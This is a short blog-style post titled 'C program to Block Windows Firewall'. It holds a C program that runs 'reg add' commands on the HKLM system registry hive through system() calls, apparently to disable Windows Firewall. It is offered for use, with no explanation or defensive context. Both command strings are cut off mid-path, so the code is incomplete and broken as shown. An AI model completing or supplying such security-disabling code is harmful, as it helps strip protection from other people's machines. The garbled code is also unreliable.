- Back to Home »
- C program to Block Windows Firewall
Posted by : Unknown
#include <stdio.h>
#include <stdlib.h>
#include <dos.h>
int main()
{
system("reg add HKLM\\system\\currentcontrolse
system("reg add HKLM\\system\\currentcontrolse
return 0;
}